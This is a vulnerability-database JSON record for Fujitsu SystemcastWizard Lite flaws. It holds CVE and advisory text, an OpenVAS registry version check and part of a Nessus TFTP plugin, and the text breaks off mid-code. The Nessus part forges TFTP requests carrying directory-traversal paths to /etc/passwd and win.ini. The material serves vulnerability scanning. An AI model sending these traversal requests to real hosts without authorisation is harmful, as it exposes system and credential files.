script_oid(\"1.3.6.1.4.1.25623.1.0.900456\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-30 14:33:42 +0100 (Fri, 30 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0264\", \"CVE-2009-0270\", \"CVE-2009-0271\");\n script_bugtraq_id(33344);\n script_name(\"FUJITSU SystemWizard Lite Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33594\");\n script_xref(name : \"URL\" , value : \"http://securityvulns.com/Vdocument198.html\");\n script_xref(name : \"URL\" , value : \"http://www.wintercore.com/advisories/advisory_W010109.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\FUJITSU\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\nfuziVer = registry_get_sz(key:\"SOFTWARE\\FUJITSU\\SystemcastWizard\",\n item:\"ProductVersion\");\nif(!fuziVer){\n exit(0);\n}\n\nwizardVer = eregmatch(pattern:\"V([0-9.]+A?)\", string:fuziVer);\nif(wizardVer[1] == NULL){\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.6a and prior\nif(version_is_less_equal(version:wizardVer[1], test_version:\"1.6A\"))\n{\n security_message(0);\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.7 to 2.0A\nif(version_is_less_equal(version:wizardVer[1], test_version:\"2.0A\"))\n{\n key = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\n path = registry_get_sz(key:key, item:\"InstallPath\");\n if(!path){\n exit(0);\n }\n\n dllPath = path + \"bin\\ChkPXESv.dll\";\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(share:share, file:file);\n if(!dllVer){\n exit(0);\n }\n\n # Check for ChkPXESv.dll file version < 4.0.11.530 or prior.\n if(version_is_less(version:dllVer, test_version:\"4.0.11.530\")){\n security_message(0);\n }\n}\n", "title": "FUJITSU SystemWizard Lite Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:28:17"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "06a620fb1ee7ec8fa23a9afed4ac8bb6"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "fd3054088fc6a3c6742ed4a35018c354"}, {"key": "href", "hash": "a1cf95887bb882175596c363cae210d3"}, {"key": "modified", "hash": "8f599a7b645c2e9ec39c6f42dccd4188"}, {"key": "naslFamily", "hash": "b9cc6a9f33ec12abd4e976263afc3918"}, {"key": "pluginID", "hash": "924ecd2be4e65f6d229a12b5a34bbd71"}, {"key": "published", "hash": "9f18fb1da60f44d8087d03b5e75cc6bd"}, {"key": "references", "hash": "062abf28c7423607c109af2c2c29d4ec"}, {"key": "reporter", "hash": "a021a3692614a7c69055764075908c6f"}, {"key": "sourceData", "hash": "5e0f37e6045301dd278211d30650c17e"}, {"key": "title", "hash": "46155588042cb4c8b59ba15f1f7c5a37"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "fffc7e70f33a4bdc3907bd499a5996ea3adc227a7270c194569b81ccce2ea566", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0270", "CVE-2009-0264", "CVE-2009-0271"]}, {"type": "openvas", "idList": ["OPENVAS:900456"]}, {"type": "jvn", "idList": ["JVN:05255562"]}, {"type": "saint", "idList": ["SAINT:F168A3089838198F30F8EFEB69B427F9", "SAINT:A87C55E95CFEB548CDC7B23D1FA42B7C", "SAINT:7FD41F00E955757DFA3F58C95540E4FD"]}, {"type": "nessus", "idList": ["TFTPD_DIR_TRAV.NASL"]}], "modified": "2019-05-29T18:40:21"}, "score": {"value": 8.0, "vector": "NONE", "modified": "2019-05-29T18:40:21"}, "vulnersScore": 8.0}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_fujitsu_syswizard_lite_mult_vuln.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# FUJITSU SystemWizard Lite Multiple Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900456\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-30 14:33:42 +0100 (Fri, 30 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0264\", \"CVE-2009-0270\", \"CVE-2009-0271\");\n script_bugtraq_id(33344);\n script_name(\"FUJITSU SystemWizard Lite Multiple Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33594\");\n script_xref(name:\"URL\", value:\"http://securityvulns.com/Vdocument198.html\");\n script_xref(name:\"URL\", value:\"http://www.wintercore.com/advisories/advisory_W010109.html\");\n script_xref(name:\"URL\", value:\"http://primeserver.fujitsu.com/primequest/products/os/windows2008.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes via\n a large PXE protocol request in a UDP packet and also directory traversal\n attack sequences in unspecified vectors.\");\n\n script_tag(name:\"affected\", value:\"FUJITSU SystemWizard Lite version 2.0A and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"Improper boundary check of input data in DefaultSkin.ini in TFTP service,\n Registry Setting Tool and PXEService.exe files.\");\n\n script_tag(name:\"solution\", value:\"Apply the security patches from the linked references.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\FUJITSU\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\nfuziVer = registry_get_sz(key:\"SOFTWARE\\FUJITSU\\SystemcastWizard\",\n item:\"ProductVersion\");\nif(!fuziVer){\n exit(0);\n}\n\nwizardVer = eregmatch(pattern:\"V([0-9.]+A?)\", string:fuziVer);\nif(wizardVer[1] == NULL){\n exit(0);\n}\n\nif(version_is_less_equal(version:wizardVer[1], test_version:\"1.6A\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n\nif(version_is_less_equal(version:wizardVer[1], test_version:\"2.0A\"))\n{\n key = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\n path = registry_get_sz(key:key, item:\"InstallPath\");\n if(!path){\n exit(0);\n }\n\n dllPath = path + \"bin\\ChkPXESv.dll\";\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(share:share, file:file);\n if(!dllVer){\n exit(0);\n }\n\n if(version_is_less(version:dllVer, test_version:\"4.0.11.530\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "naslFamily": "Buffer overflow", "pluginID": "1361412562310900456", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "Buffer overflow in the Registry Setting Tool in Fujitsu SystemcastWizard Lite 2.0A, 2.0, 1.9, and earlier has unknown impact and attack vectors.", "modified": "2017-08-08T01:33:00", "id": "CVE-2009-0264", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0264", "published": "2009-01-26T15:30:00", "title": "CVE-2009-0264", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in the TFTP service in Fujitsu SystemcastWizard Lite 2.0A, 2.0, 1.9, and earlier allows remote attackers to read arbitrary files via directory traversal sequences in unspecified vectors.", "modified": "2011-03-08T03:18:00", "id": "CVE-2009-0271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0271", "published": "2009-01-26T19:30:00", "title": "CVE-2009-0271", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in PXEService.exe in Fujitsu SystemcastWizard Lite 2.0A, 2.0, 1.9, and earlier allows remote attackers to execute arbitrary code via a large PXE protocol request in a UDP packet.", "modified": "2018-10-11T21:01:00", "id": "CVE-2009-0270", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0270", "published": "2009-01-26T19:30:00", "title": "CVE-2009-0270", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:14:11", "bulletinFamily": "scanner", "description": "This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.", "modified": "2017-02-20T00:00:00", "published": "2009-01-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900456", "id": "OPENVAS:900456", "title": "FUJITSU SystemWizard Lite Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_fujitsu_syswizard_lite_mult_vuln.nasl 5369 2017-02-20 14:48:07Z cfi $\n#\n# FUJITSU SystemWizard Lite Multiple Vulnerabilities\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes via\n a large PXE protocol request in a UDP packet and also directory traversal\n attack sequences in unspecified vectors.\n Impact Level: Application\";\ntag_affected = \"FUJITSU SystemWizard Lite version 2.0A and prior on Windows.\";\ntag_insight = \"Improper boundary check of input data in DefaultSkin.ini in TFTP service,\n Registry Setting Tool and PXEService.exe files.\";\ntag_solution = \"Apply the security patches.\n http://primeserver.fujitsu.com/primequest/products/os/windows2008.html\";\ntag_summary = \"This host is installed with FUJITSU SystemWizard Lite and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(900456);\n script_version(\"$Revision: 5369 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:48:07 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-30 14:33:42 +0100 (Fri, 30 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0264\", \"CVE-2009-0270\", \"CVE-2009-0271\");\n script_bugtraq_id(33344);\n script_name(\"FUJITSU SystemWizard Lite Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33594\");\n script_xref(name : \"URL\" , value : \"http://securityvulns.com/Vdocument198.html\");\n script_xref(name : \"URL\" , value : \"http://www.wintercore.com/advisories/advisory_W010109.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\FUJITSU\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\nfuziVer = registry_get_sz(key:\"SOFTWARE\\FUJITSU\\SystemcastWizard\",\n item:\"ProductVersion\");\nif(!fuziVer){\n exit(0);\n}\n\nwizardVer = eregmatch(pattern:\"V([0-9.]+A?)\", string:fuziVer);\nif(wizardVer[1] == NULL){\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.6a and prior\nif(version_is_less_equal(version:wizardVer[1], test_version:\"1.6A\"))\n{\n security_message(0);\n exit(0);\n}\n\n# Check for FUJITSU SystemWizard version 1.7 to 2.0A\nif(version_is_less_equal(version:wizardVer[1], test_version:\"2.0A\"))\n{\n key = \"SOFTWARE\\FUJITSU\\SystemcastWizard\";\n path = registry_get_sz(key:key, item:\"InstallPath\");\n if(!path){\n exit(0);\n }\n\n dllPath = path + \"bin\\ChkPXESv.dll\";\n share = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(share:share, file:file);\n if(!dllVer){\n exit(0);\n }\n\n # Check for ChkPXESv.dll file version < 4.0.11.530 or prior.\n if(version_is_less(version:dllVer, test_version:\"4.0.11.530\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "description": "Added: 03/03/2009 \nCVE: [CVE-2009-0270](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0270>) \nBID: [33342](<http://www.securityfocus.com/bid/33342>) \nOSVDB: [51486](<http://www.osvdb.org/51486>) \n\n\n### Background\n\nSystemcastWizard Lite is support software for the setup of Primequest systems. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a long, specially crafted datagram to the PXE service. \n\n### Resolution\n\nApply the patch referenced on the precautions page for [Windows Server 2008](<http://www.fujitsu.com/global/services/computing/server/primequest/products/os/windows-server-2008-2.html>) or [Windows Server 2003](<http://www.fujitsu.com/global/services/computing/server/primequest/products/os/windows-server-2003-2.html>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/500172> \n\n\n### Limitations\n\nExploit works on Fujitsu SystemcastWizard Lite 1.9. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2009-03-03T00:00:00", "published": "2009-03-03T00:00:00", "id": "SAINT:F168A3089838198F30F8EFEB69B427F9", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/fujitsu_systemcastwizard_lite_pxe", "title": "Fujitsu SystemcastWizard Lite PXE service buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "description": "Added: 03/03/2009 \nCVE: [CVE-2009-0270](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0270>) \nBID: [33342](<http://www.securityfocus.com/bid/33342>) \nOSVDB: [51486](<http://www.osvdb.org/51486>) \n\n\n### Background\n\nSystemcastWizard Lite is support software for the setup of Primequest systems. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a long, specially crafted datagram to the PXE service. \n\n### Resolution\n\nApply the patch referenced on the precautions page for [Windows Server 2008](<http://www.fujitsu.com/global/services/computing/server/primequest/products/os/windows-server-2008-2.html>) or [Windows Server 2003](<http://www.fujitsu.com/global/services/computing/server/primequest/products/os/windows-server-2003-2.html>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/500172> \n\n\n### Limitations\n\nExploit works on Fujitsu SystemcastWizard Lite 1.9. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2009-03-03T00:00:00", "published": "2009-03-03T00:00:00", "id": "SAINT:7FD41F00E955757DFA3F58C95540E4FD", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/fujitsu_systemcastwizard_lite_pxe", "type": "saint", "title": "Fujitsu SystemcastWizard Lite PXE service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "description": "Added: 03/03/2009 \nCVE: [CVE-2009-0270](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0270>) \nBID: [33342](<http://www.securityfocus.com/bid/33342>) \nOSVDB: [51486](<http://www.osvdb.org/51486>) \n\n\n### Background\n\nSystemcastWizard Lite is support software for the setup of Primequest systems. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending a long, specially crafted datagram to the PXE service. \n\n### Resolution\n\nApply the patch referenced on the precautions page for [Windows Server 2008](<http://www.fujitsu.com/global/services/computing/server/primequest/products/os/windows-server-2008-2.html>) or [Windows Server 2003](<http://www.fujitsu.com/global/services/computing/server/primequest/products/os/windows-server-2003-2.html>). \n\n### References\n\n<http://www.securityfocus.com/archive/1/500172> \n\n\n### Limitations\n\nExploit works on Fujitsu SystemcastWizard Lite 1.9. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2009-03-03T00:00:00", "published": "2009-03-03T00:00:00", "id": "SAINT:A87C55E95CFEB548CDC7B23D1FA42B7C", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/fujitsu_systemcastwizard_lite_pxe", "type": "saint", "title": "Fujitsu SystemcastWizard Lite PXE service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2019-05-29T17:21:48", "bulletinFamily": "info", "description": "\n ## Description\n\nProducts that use the PXE SDK sample code provided by Intel contain directory traversal and buffer overflow vulnerabilities.\n\n ## Impact\n\nInformation stored by the product using the PXE SDK sample code may be viewed, or arbitrary code may be executed.\n\n ## Solution\n\n**Update the software** \nUpdate according to the information provided by the product developer.\n\n ## Products Affected\n\nProducts that use the PXE SDK sample may be vulnerable. \n \nFor more information, refer to the vendor information under \"Vendor Status\"\n", "modified": "2013-01-30T00:00:00", "published": "2011-12-15T00:00:00", "id": "JVN:05255562", "href": "http://jvn.jp/en/jp/JVN05255562/index.html", "title": "JVN#05255562: Multiple vulnerabilities in products that use the Preboot Execution Environment (PXE) SDK", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-12-13T09:44:19", "bulletinFamily": "scanner", "description": "The TFTP (Trivial File Transfer Protocol) server running on the remote\nhost is vulnerable to a directory traversal attack that allows an\nattacker to read arbitrary files on the remote host by prepending\ntheir names with directory traversal sequences.", "modified": "2019-12-02T00:00:00", "id": "TFTPD_DIR_TRAV.NASL", "href": "https://www.tenable.com/plugins/nessus/18262", "published": "2005-05-16T00:00:00", "title": "TFTP Traversal Arbitrary File Access", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This script replaces the old C plugin \"tftp_grab_file\".\n#\n# References:\n# From:\tLuigi Auriemma <aluigi@autistici.org>\n# To:\tbugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk,\n#\tpacket@packetstormsecurity.org,cert@cert.org,news@securiteam.com\n# Date:\tWed, Apr 2, 2008 at 8:42 PM\n# Subject: Directory traversal in LANDesk Management Suite 8.80.1.1\n#\n# From:\tLuigi Auriemma <aluigi@autistici.org>\n# To:\tbugtraq@securityfocus.com,full-disclosure@lists.grok.org.uk,\n#\tpacket@packetstormsecurity.org,cert@cert.org,news@securiteam.com,\n# Date:\tMon, Mar 31, 2008 at 9:48 PM\n# Subject: Directory traversal in 2X ThinClientServer v5.0_sp1-r3497\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18262);\n script_version(\"1.53\");\n script_cvs_date(\"Date: 2019/03/06 18:38:55\");\n\n script_cve_id(\n \"CVE-1999-0183\",\n \"CVE-1999-0498\",\n \"CVE-2002-2353\",\n \"CVE-2009-0271\",\n \"CVE-2009-0288\",\n \"CVE-2009-1161\"\n );\n script_bugtraq_id(\n 6198,\n 11582,\n 11584,\n 33287,\n 33344,\n 35040,\n 42907,\n 48272,\n 50441,\n 52938\n );\n script_xref(name:\"EDB-ID\", value:\"14857\");\n script_xref(name:\"EDB-ID\", value:\"17507\");\n script_xref(name:\"EDB-ID\", value:\"18718\");\n\n script_name(english:\"TFTP Traversal Arbitrary File Access\");\n script_summary(english:\"Attempts to grab a file through TFTP\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote TFTP server can be used to read arbitrary files on the\nremote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"The TFTP (Trivial File Transfer Protocol) server running on the remote\nhost is vulnerable to a directory traversal attack that allows an\nattacker to read arbitrary files on the remote host by prepending\ntheir names with directory traversal sequences.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the remote TFTP daemon, run it in a chrooted environment, or\nfilter incoming traffic to this port.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Distinct TFTP 3.10 Writable Directory Traversal Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1986/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Misc.\");\n\n # Warning! We cannot depend on tftpd_backdoor!\n script_dependencies('tftpd_detect.nasl', \"os_fingerprint.nasl\");\n script_require_keys(\"Services/udp/tftp\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"dump.inc\");\ninclude(\"tftp.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"data_protection.inc\");\n\nif(islocalhost()) exit(0, \"This plugin does not run against the localhost.\");\t# ?\nif ( TARGET_IS_IPV6 ) exit(0, \"This plugin does not run over IPv6.\");\n\nglobal_var\tnb;\nfunction tftp_grab(port, file)\n{\n local_var\treq, rep, sport, ip, u, filter, data, i;\n\n req = '\\x00\\x01'+file+'\\0netascii\\0';\n sport = rand() % 64512 + 1024;\n\n ip = forge_ip_packet(ip_hl : 5, ip_v: 4, ip_tos:0,\n\tip_len:20, ip_off:0, ip_ttl:64, ip_p:IPPROTO_UDP,\n\tip_src: compat::this_host());\n\n u = forge_udp_packet(ip:ip, uh_sport: sport, uh_dport:port, uh_ulen: 8 + strlen(req), data:req);\n\n filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';\n\n data = NULL;\n for (i = 0; i < 2; i ++)\t# Try twice\n {\n rep = send_packet(u, pcap_active:TRUE, pcap_filter:filter);\n if(rep)\n {\n if (debug_level > 2) dump(ddata: rep, dtitle: 'TFTP (IP)');\n data = get_udp_element(udp: rep, element:\"data\");\n if (debug_level > 1) dump(ddata: data, dtitle: 'TFTP (UDP)');\n if (data[0] == '\\0' && data[1] == '\\x03')\n {\n local_var\tc;\n c = substr(data, 4);\n # debug_print('Content of ',file, \"= \", c, '\\n'r);\n set_kb_item(name: 'tftp/'+port+'/filename/'+ nb, value: file);\n set_kb_item(name: 'tftp/'+port+'/filecontent/'+ nb, value: c);\n nb ++;\n return c;\n }\n else\n return NULL;\n }\n }\n return NULL;\n}\n\nport = get_kb_item('Services/udp/tftp');\nif (! port) port = 69;\nnb = 0;\n\nif (!get_udp_port_state(port)) audit(AUDIT_PORT_CLOSED, port, \"UDP\");\n\n\nexploits = make_array();\nexploits['windows'] = make_list(\n \"win.ini\",\n \"Windows/win.ini\",\n \"WINNT/win.ini\",\n \"/Windows/win.ini\",\n \"/WINNT/win.ini\",\n mult_str(str:\"../\", nb:10) + \"Windows/win.ini\",\n mult_str(str:\"../\", nb:10) + \"WINNT/win.ini\",\n mult_str(str:\".../\", nb:10) + \"Windows/win.ini\",\n mult_str(str:\".../\", nb:10) + \"WINNT/win.ini\",\n \"x/\" + mult_str(str:\"../\", nb:10) + \"Windows/win.ini\",\n \"x/\" + mult_str(str:\"../\", nb:10) + \"WINNT/win.ini\",\n \"x/Windows/win.ini\",\n \"x/WINNT/win.ini\",\n \"C:/Windows/win.ini\",\n \"C:/WINNT/win.ini\",\n \"Windows\\win.ini\",\n \"WINNT\\win.ini\",\n \"\\Windows\\win.ini\",\n \"\\WINNT\\win.ini\",\n mult_str(str:\"..\\\", nb:10) + \"Windows\\win.ini\",\n mult_str(str:\"..\\\", nb:10) + \"WINNT\\win.ini\",\n mult_str(str:\"...\\\", nb:10) + \"Windows\\win.ini\",\n mult_str(str:\"...\\\", nb:10) + \"WINNT\\win.ini\",\n \"x\\\" + mult_str(str:\"..\\\", nb:10) + \"Windows\\win.ini\",\n \"x\\\" + mult_str(str:\"..\\\", nb:10) + \"WINNT\\win.ini\",\n \"x\\Windows\\win.ini\",\n \"x\\WINNT\\win.ini\",\n \"C:\\Windows\\win.ini\",\n \"C:\\WINNT\\win.ini\"\n);\nexploits['nix'] = make_list(\n \"/etc/passwd\",\n mult_str(str:\"../\", nb:10) + \"etc/passwd\"\n);\n\nvulns = make_list();\nobtained_contents = \"\";\nobtained_file = \"\";\n\nos = get_kb_item(\"Host/OS\");\n\nforeach os_type (keys(exploits))\n{\n # Run all exploits in paranoid mode\n # otherwise just for the detected OS\n if (!isnull(os) && report_paranoia < 2)\n {\n if (\"windows\" >< tolower(os) && os_type != \"windows\") continue;\n if (\"windows\" >!< tolower(os) && os_type == \"windows\") continue;\n }\n\n exploit_list = exploits[os_type];\n\n foreach file (exploit_list)\n {\n # Try using netascii mode.\n f = tftp_grab(port: port, file: file);\n # If that failed, try octet mode.\n if (isnull(f)) f = tftp_get(port:port, path:file);\n if (f)\n {\n # 